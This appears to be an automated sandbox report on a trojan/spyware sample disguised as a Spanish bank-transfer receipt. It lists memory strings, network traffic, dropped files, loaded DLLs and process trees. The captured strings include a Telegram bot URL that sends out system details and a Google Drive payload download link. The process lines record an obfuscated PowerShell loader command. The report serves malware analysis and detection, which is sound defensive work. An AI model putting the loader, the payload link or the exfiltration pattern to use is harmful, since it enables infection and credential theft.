Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021413000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021413000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: msiexec.exe, 0000000B.00000002.2203518300.000000002140E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Bg
Source: msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2202480219.00000000206C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2-
Source: msiexec.exe, 0000000B.00000002.2190551955.00000000056A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2190551955.000000000567F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2-&export=download
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.1204954119.00000254754C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1321322749.0000000007769000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.miB
Source: powershell.exe, 00000001.00000002.1321322749.0000000007769000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.miBitLocker.psd1am.
Source: powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: msiexec.exe, 0000000B.00000002.2203518300.00000000212CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.000000002133E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 0000000B.00000002.2203518300.00000000212CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 0000000B.00000002.2203518300.000000002133E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.00000000212F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.000000002133E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021444000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8
Source: msiexec.exe, 0000000B.00000002.2203518300.000000002143F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.7:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051BA

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe

Jump to dropped file

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040322B

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_004049F9	0_2_004049F9
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_004064AE	0_2_004064AE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105C146	11_2_2105C146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21055370	11_2_21055370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105D278	11_2_2105D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105C468	11_2_2105C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105C738	11_2_2105C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105E988	11_2_2105E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105CA08	11_2_2105CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105CCD8	11_2_2105CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105CFAA	11_2_2105CFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105A088	11_2_2105A088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105F961	11_2_2105F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_2105E97A	11_2_2105E97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_210569A0	11_2_210569A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_210529E0	11_2_210529E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21056FC8	11_2_21056FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_21053E09	11_2_21053E09

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll 3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9

Source: justificante de transferencia09454545.exe, 00000000.00000000.930723902.0000000000433000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameimmensest autoecic.exe6 vs justificante de transferencia09454545.exe
Source: justificante de transferencia09454545.exe	Binary or memory string: OriginalFilenameimmensest autoecic.exe6 vs justificante de transferencia09454545.exe
Source: justificante de transferencia09454545.exe.1.dr	Binary or memory string: OriginalFilenameimmensest autoecic.exe6 vs justificante de transferencia09454545.exe

Source: justificante de transferencia09454545.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/25@6/6

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

0_2_0040322B

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404486

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

File created: C:\Users\user\AppData\Roaming\fyldepenneblkkets

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsmE666.tmp

Jump to behavior

Source: justificante de transferencia09454545.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021520000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.00000000214EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.00000000214DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.00000000214FB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.000000002152D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: justificante de transferencia09454545.exe	Virustotal: Detection: 73%
Source: justificante de transferencia09454545.exe	ReversingLabs: Detection: 66%

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

File read: C:\Users\user\Desktop\justificante de transferencia09454545.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\justificante de transferencia09454545.exe "C:\Users\user\Desktop\justificante de transferencia09454545.exe"
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
